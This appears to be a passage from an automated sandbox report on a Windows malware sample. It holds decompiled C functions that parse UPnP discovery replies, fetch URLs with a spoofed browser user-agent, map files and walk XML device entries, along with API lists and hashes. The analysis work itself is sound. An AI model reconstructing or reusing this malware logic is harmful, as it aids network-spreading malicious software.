                                                                                                                                                                                                                                                                  0x0040e5d4
                                                                                                                                                                                                                                                                  0x0040e5ec
                                                                                                                                                                                                                                                                  0x0040e5f6
                                                                                                                                                                                                                                                                  0x0040e600
                                                                                                                                                                                                                                                                  0x0040e604
                                                                                                                                                                                                                                                                  0x0040e608
                                                                                                                                                                                                                                                                  0x0040e61a
                                                                                                                                                                                                                                                                  0x0040e626
                                                                                                                                                                                                                                                                  0x0040e62a
                                                                                                                                                                                                                                                                  0x0040e634
                                                                                                                                                                                                                                                                  0x0040e63b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e641
                                                                                                                                                                                                                                                                  0x0040e641
                                                                                                                                                                                                                                                                  0x0040e64d
                                                                                                                                                                                                                                                                  0x0040e64d
                                                                                                                                                                                                                                                                  0x0040e5a9
                                                                                                                                                                                                                                                                  0x0040e5bb
                                                                                                                                                                                                                                                                  0x0040e5bb
                                                                                                                                                                                                                                                                  0x0040e5a7
                                                                                                                                                                                                                                                                  0x0040e59b

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 0040E586
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E5B0
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E5C3
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(?,?), ref: 0040E5D4
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E65B
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E6F6
                                                                                                                                                                                                                                                                  • setsockopt.WS2_32 ref: 0040E72C
                                                                                                                                                                                                                                                                  • closesocket.WS2_32(?), ref: 0040E739
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BB80: NtQuerySystemTime.NTDLL ref: 0040BB8A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BB80: RtlTimeToSecondsSince1980.NTDLL ref: 0040BB98
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 671207744-0
                                                                                                                                                                                                                                                                  • Opcode ID: b79768d1b72cec46eaa8f69dca462b5c27b05df81c06aaaae392fe69171f8df6
                                                                                                                                                                                                                                                                  • Instruction ID: 51cd7334bbd969a96dec868ba5125ba97ee3022df73e2af357cdf7292c47256f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b79768d1b72cec46eaa8f69dca462b5c27b05df81c06aaaae392fe69171f8df6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0151CD75608702ABC714DF39D888B97F7E0BFC8314F408A3EE48993351D735A5198B96
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                                                                                                                                  			E0040C1B0(intOrPtr __eax, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                  				char _v1028;
                                                                                                                                                                                                                                                                  				char _v1029;
                                                                                                                                                                                                                                                                  				intOrPtr _v1036;
                                                                                                                                                                                                                                                                  				char* _v1040;
                                                                                                                                                                                                                                                                  				char* _v1044;
                                                                                                                                                                                                                                                                  				intOrPtr _t20;
                                                                                                                                                                                                                                                                  				intOrPtr _t29;
                                                                                                                                                                                                                                                                  				void* _t37;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t20 = __eax;
                                                                                                                                                                                                                                                                  				_v1029 = 0;
                                                                                                                                                                                                                                                                  				_v1036 = 0;
                                                                                                                                                                                                                                                                  				while(_v1036 < 2) {
                                                                                                                                                                                                                                                                  					__imp__#17(_a4,  &_v1028, 0x400, 0, 0, 0);
                                                                                                                                                                                                                                                                  					if(_t20 != 0xffffffff) {
                                                                                                                                                                                                                                                                  						_v1029 = 1;
                                                                                                                                                                                                                                                                  						if(StrCmpNIA( &_v1028, "HTTP/1.1 200 OK", 0xf) == 0) {
                                                                                                                                                                                                                                                                  							_v1040 = StrStrIA( &_v1028, "LOCATION: ");
                                                                                                                                                                                                                                                                  							if(_v1040 != 0) {
                                                                                                                                                                                                                                                                  								_v1044 = _v1040 + 0xa;
                                                                                                                                                                                                                                                                  								_t29 = E0040AFB0(_v1044, _v1044, StrChrA(_v1044, 0xd) - _v1044);
                                                                                                                                                                                                                                                                  								_t37 = _t37 + 8;
                                                                                                                                                                                                                                                                  								 *_a8 = _t29;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						Sleep(0x3e8);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t20 = _v1036 + 1;
                                                                                                                                                                                                                                                                  					_v1036 = _t20;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v1029;
                                                                                                                                                                                                                                                                  			}











                                                                                                                                                                                                                                                                  0x0040c1b0
                                                                                                                                                                                                                                                                  0x0040c1b9
                                                                                                                                                                                                                                                                  0x0040c1c0
                                                                                                                                                                                                                                                                  0x0040c1db
                                                                                                                                                                                                                                                                  0x0040c1fe
                                                                                                                                                                                                                                                                  0x0040c207
                                                                                                                                                                                                                                                                  0x0040c216
                                                                                                                                                                                                                                                                  0x0040c233
                                                                                                                                                                                                                                                                  0x0040c247
                                                                                                                                                                                                                                                                  0x0040c254
                                                                                                                                                                                                                                                                  0x0040c25f
                                                                                                                                                                                                                                                                  0x0040c282
                                                                                                                                                                                                                                                                  0x0040c287
                                                                                                                                                                                                                                                                  0x0040c28d
                                                                                                                                                                                                                                                                  0x0040c28d
                                                                                                                                                                                                                                                                  0x0040c254
                                                                                                                                                                                                                                                                  0x0040c209
                                                                                                                                                                                                                                                                  0x0040c20e
                                                                                                                                                                                                                                                                  0x0040c20e
                                                                                                                                                                                                                                                                  0x0040c1d2
                                                                                                                                                                                                                                                                  0x0040c1d5
                                                                                                                                                                                                                                                                  0x0040c1d5
                                                                                                                                                                                                                                                                  0x0040c29d

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C1FE
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040C20E
                                                                                                                                                                                                                                                                  • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C22B
                                                                                                                                                                                                                                                                  • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C241
                                                                                                                                                                                                                                                                  • StrChrA.SHLWAPI(?,0000000D), ref: 0040C26E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Sleeprecvfrom
                                                                                                                                                                                                                                                                  • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                                                                                                                                                                  • API String ID: 668330359-3973262388
                                                                                                                                                                                                                                                                  • Opcode ID: 766efd74480ade401ae97df32cec916cef99da7e067a91872a851bbd2d4f1667
                                                                                                                                                                                                                                                                  • Instruction ID: 19bae495d964df930a5416a6b101112f45a73436487c04b08a4f8f7f296c2ab0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 766efd74480ade401ae97df32cec916cef99da7e067a91872a851bbd2d4f1667
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 382165B0940218DBDB30DF64DD85BA97774AB04308F1086F9E709BA5C1C6B859CA8F5C
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040D160(char* _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                  				void* _v8;
                                                                                                                                                                                                                                                                  				char _v9;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				void _v20;
                                                                                                                                                                                                                                                                  				long _v24;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v9 = 0;
                                                                                                                                                                                                                                                                  				_v16 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36", 1, 0, 0, 0);
                                                                                                                                                                                                                                                                  				if(_v16 != 0) {
                                                                                                                                                                                                                                                                  					_v8 = InternetOpenUrlA(_v16, _a4, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                                                                                                                                                  						_v24 = 4;
                                                                                                                                                                                                                                                                  						HttpQueryInfoA(_v8, 0x20000005,  &_v20,  &_v24, 0);
                                                                                                                                                                                                                                                                  						if(_v20 > 0x1388 && _v20 !=  *_a8) {
                                                                                                                                                                                                                                                                  							 *_a8 = _v20;
                                                                                                                                                                                                                                                                  							_v9 = 1;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						InternetCloseHandle(_v8);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					InternetCloseHandle(_v16);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				Sleep(0x3e8);
                                                                                                                                                                                                                                                                  				return _v9;
                                                                                                                                                                                                                                                                  			}








                                                                                                                                                                                                                                                                  0x0040d166
                                                                                                                                                                                                                                                                  0x0040d17d
                                                                                                                                                                                                                                                                  0x0040d184
                                                                                                                                                                                                                                                                  0x0040d19c
                                                                                                                                                                                                                                                                  0x0040d1a3
                                                                                                                                                                                                                                                                  0x0040d1a5
                                                                                                                                                                                                                                                                  0x0040d1bf
                                                                                                                                                                                                                                                                  0x0040d1cc
                                                                                                                                                                                                                                                                  0x0040d1de
                                                                                                                                                                                                                                                                  0x0040d1e0
                                                                                                                                                                                                                                                                  0x0040d1e0
                                                                                                                                                                                                                                                                  0x0040d1e8
                                                                                                                                                                                                                                                                  0x0040d1e8
                                                                                                                                                                                                                                                                  0x0040d1f2
                                                                                                                                                                                                                                                                  0x0040d1f2
                                                                                                                                                                                                                                                                  0x0040d1fd
                                                                                                                                                                                                                                                                  0x0040d209

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040D177
                                                                                                                                                                                                                                                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D196
                                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040D1BF
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D1E8
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D1F2
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D1FD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36, xrefs: 0040D172
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  • API String ID: 2743515581-922322672
                                                                                                                                                                                                                                                                  • Opcode ID: 9580dc84764a9631a1c584e1580e1d15ff9d3e5fb4ab9709a14850b64044bd1a
                                                                                                                                                                                                                                                                  • Instruction ID: 6415d18d8a99034fddaf571bd804c2e16c3977809638760880a7fb89b11d9709
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9580dc84764a9631a1c584e1580e1d15ff9d3e5fb4ab9709a14850b64044bd1a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7821FC74E40209EBDB20DF94CD49F9EB775AB48705F208475FA11BB2C0CBB56A48CB55
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00404320() {
                                                                                                                                                                                                                                                                  				void* _v8;
                                                                                                                                                                                                                                                                  				void* _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				long _v20;
                                                                                                                                                                                                                                                                  				void* _v24;
                                                                                                                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                                                                                                                  				void* _t35;
                                                                                                                                                                                                                                                                  				intOrPtr _t45;
                                                                                                                                                                                                                                                                  				void* _t66;
                                                                                                                                                                                                                                                                  				void* _t67;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				InitializeCriticalSection(0x412f50);
                                                                                                                                                                                                                                                                  				_t35 = CreateFileW(0x413180, 0x80000000, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                  				_v8 = _t35;
                                                                                                                                                                                                                                                                  				if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					_v12 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                                                                                                                                                                                                  					if(_v12 == 0) {
                                                                                                                                                                                                                                                                  						L14:
                                                                                                                                                                                                                                                                  						return CloseHandle(_v8);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v16 = MapViewOfFile(_v12, 4, 0, 0, 0);
                                                                                                                                                                                                                                                                  					if(_v16 == 0) {
                                                                                                                                                                                                                                                                  						L13:
                                                                                                                                                                                                                                                                  						CloseHandle(_v12);
                                                                                                                                                                                                                                                                  						goto L14;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v20 = GetFileSize(_v8, 0);
                                                                                                                                                                                                                                                                  					_v24 = _v16;
                                                                                                                                                                                                                                                                  					while(_v20 != 0) {
                                                                                                                                                                                                                                                                  						if(_v20 >= 0x100) {
                                                                                                                                                                                                                                                                  							_t45 = E0040AF30(_v24, _v24);
                                                                                                                                                                                                                                                                  							_t67 = _t66 + 4;
                                                                                                                                                                                                                                                                  							_v28 = _t45;
                                                                                                                                                                                                                                                                  							if(_v28 != 0) {
                                                                                                                                                                                                                                                                  								_v20 = _v20 - 0x100;
                                                                                                                                                                                                                                                                  								if(_v20 >=  *((intOrPtr*)(_v28 + 0xc))) {
                                                                                                                                                                                                                                                                  									E00404210(_v24, _v28, _v24,  *((intOrPtr*)(_v28 + 0xc)) + 0x100, 0);
                                                                                                                                                                                                                                                                  									_t66 = _t67 + 0x10;
                                                                                                                                                                                                                                                                  									_v20 = _v20 -  *((intOrPtr*)(_v28 + 0xc));
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								E00408990(_v28);
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					UnmapViewOfFile(_v16);
                                                                                                                                                                                                                                                                  					goto L13;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t35;
                                                                                                                                                                                                                                                                  			}













                                                                                                                                                                                                                                                                  0x0040432b
                                                                                                                                                                                                                                                                  0x00404345
                                                                                                                                                                                                                                                                  0x0040434b
                                                                                                                                                                                                                                                                  0x00404352
                                                                                                                                                                                                                                                                  0x0040436c
                                                                                                                                                                                                                                                                  0x00404373
                                                                                                                                                                                                                                                                  0x0040443b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040443f
                                                                                                                                                                                                                                                                  0x0040438b
                                                                                                                                                                                                                                                                  0x00404392
                                                                                                                                                                                                                                                                  0x00404431
                                                                                                                                                                                                                                                                  0x00404435
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404435
                                                                                                                                                                                                                                                                  0x004043a4
                                                                                                                                                                                                                                                                  0x004043aa
                                                                                                                                                                                                                                                                  0x004043ad
                                                                                                                                                                                                                                                                  0x004043ba
                                                                                                                                                                                                                                                                  0x004043c2
                                                                                                                                                                                                                                                                  0x004043c7
                                                                                                                                                                                                                                                                  0x004043ca
                                                                                                                                                                                                                                                                  0x004043d1
                                                                                                                                                                                                                                                                  0x004043de
                                                                                                                                                                                                                                                                  0x004043ea
                                                                                                                                                                                                                                                                  0x00404411
                                                                                                                                                                                                                                                                  0x00404416
                                                                                                                                                                                                                                                                  0x00404422
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404422
                                                                                                                                                                                                                                                                  0x004043f0
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004043f5
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004043d3
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004043bc
                                                                                                                                                                                                                                                                  0x0040442b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040442b
                                                                                                                                                                                                                                                                  0x00404448

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00412F50,?,?,?,?,?,00406247), ref: 0040432B
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00413180,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00406247), ref: 00404345
                                                                                                                                                                                                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00404366
                                                                                                                                                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00404385
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040439E
                                                                                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040442B
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00404435
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040443F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3956458805-0
                                                                                                                                                                                                                                                                  • Opcode ID: afe1eb869866639b1fe7b092215121f765bbc30eff8fe0f728147ad0b59ede4b
                                                                                                                                                                                                                                                                  • Instruction ID: 8cf7ad255a7857f357f70f31b3d1861fd7fd2a42964d5e35bc13e120cdf15e34
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: afe1eb869866639b1fe7b092215121f765bbc30eff8fe0f728147ad0b59ede4b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C83130B4E40209EFDB10DFE4DD4ABAEB770AB88711F208579E6017B6C0D7B46941CB99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                                                                                                                                  			E0040C600(intOrPtr* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                                                  				char _v8;
                                                                                                                                                                                                                                                                  				WCHAR* _v12;
                                                                                                                                                                                                                                                                  				WCHAR* _v16;
                                                                                                                                                                                                                                                                  				void* _v20;
                                                                                                                                                                                                                                                                  				WCHAR* _v24;
                                                                                                                                                                                                                                                                  				intOrPtr* _v28;
                                                                                                                                                                                                                                                                  				WCHAR* _v32;
                                                                                                                                                                                                                                                                  				intOrPtr* _t65;
                                                                                                                                                                                                                                                                  				void* _t99;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_push( &_v8);
                                                                                                                                                                                                                                                                  				_push(_a4);
                                                                                                                                                                                                                                                                  				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                                                                                                                                                                                                  					_v16 = 0;
                                                                                                                                                                                                                                                                  					while(_v16 < _v8) {
                                                                                                                                                                                                                                                                  						_v20 = 0;
                                                                                                                                                                                                                                                                  						_push( &_v20);
                                                                                                                                                                                                                                                                  						_push(_v16);
                                                                                                                                                                                                                                                                  						_push(_a4);
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                                                                                                                                                                                                  							L21:
                                                                                                                                                                                                                                                                  							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                  							continue;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_v24 = 0;
                                                                                                                                                                                                                                                                  							_push( &_v24);
                                                                                                                                                                                                                                                                  							_push(_v20);
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                                                                                                                                                                                                  								if(lstrcmpiW(_v24, L"device") == 0) {
                                                                                                                                                                                                                                                                  									_t65 = E0040BF20(_v20, L"deviceType");
                                                                                                                                                                                                                                                                  									_t99 = _t99 + 8;
                                                                                                                                                                                                                                                                  									_v28 = _t65;
                                                                                                                                                                                                                                                                  									if(_v28 != 0) {
                                                                                                                                                                                                                                                                  										_v32 = 0;
                                                                                                                                                                                                                                                                  										_push( &_v32);
                                                                                                                                                                                                                                                                  										_push(_v28);
                                                                                                                                                                                                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                                                                                                                                                                                                  											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                                                                                                                                                                                                  												_v12 = _v20;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											__imp__#6(_v32);
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								__imp__#6(_v24);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							if(_v12 == 0) {
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                                                                                                                                                                                                  								goto L21;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L22;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L22:
                                                                                                                                                                                                                                                                  				return _v12;
                                                                                                                                                                                                                                                                  			}












                                                                                                                                                                                                                                                                  0x0040c606
                                                                                                                                                                                                                                                                  0x0040c60d
                                                                                                                                                                                                                                                                  0x0040c617
                                                                                                                                                                                                                                                                  0x0040c620
                                                                                                                                                                                                                                                                  0x0040c628
                                                                                                                                                                                                                                                                  0x0040c638
                                                                                                                                                                                                                                                                  0x0040c64a
                                                                                                                                                                                                                                                                  0x0040c656
                                                                                                                                                                                                                                                                  0x0040c660
                                                                                                                                                                                                                                                                  0x0040c664
                                                                                                                                                                                                                                                                  0x0040c66d
                                                                                                                                                                                                                                                                  0x0040c675
                                                                                                                                                                                                                                                                  0x0040c753
                                                                                                                                                                                                                                                                  0x0040c647
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c685
                                                                                                                                                                                                                                                                  0x0040c685
                                                                                                                                                                                                                                                                  0x0040c68f
                                                                                                                                                                                                                                                                  0x0040c698
                                                                                                                                                                                                                                                                  0x0040c6a3
                                                                                                                                                                                                                                                                  0x0040c6c4
                                                                                                                                                                                                                                                                  0x0040c6cf
                                                                                                                                                                                                                                                                  0x0040c6d4
                                                                                                                                                                                                                                                                  0x0040c6d7
                                                                                                                                                                                                                                                                  0x0040c6de
                                                                                                                                                                                                                                                                  0x0040c6e0
                                                                                                                                                                                                                                                                  0x0040c6ea
                                                                                                                                                                                                                                                                  0x0040c6f3
                                                                                                                                                                                                                                                                  0x0040c6fb
                                                                                                                                                                                                                                                                  0x0040c713
                                                                                                                                                                                                                                                                  0x0040c718
                                                                                                                                                                                                                                                                  0x0040c718
                                                                                                                                                                                                                                                                  0x0040c71f
                                                                                                                                                                                                                                                                  0x0040c71f
                                                                                                                                                                                                                                                                  0x0040c731
                                                                                                                                                                                                                                                                  0x0040c731
                                                                                                                                                                                                                                                                  0x0040c6de
                                                                                                                                                                                                                                                                  0x0040c737
                                                                                                                                                                                                                                                                  0x0040c737
                                                                                                                                                                                                                                                                  0x0040c741
                                                                                                                                                                                                                                                                  0x0040c751
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c743
                                                                                                                                                                                                                                                                  0x0040c741
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c675
                                                                                                                                                                                                                                                                  0x0040c64a
                                                                                                                                                                                                                                                                  0x0040c758
                                                                                                                                                                                                                                                                  0x0040c75e

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,device), ref: 0040C6BC
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C70B
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C71F
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C737
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
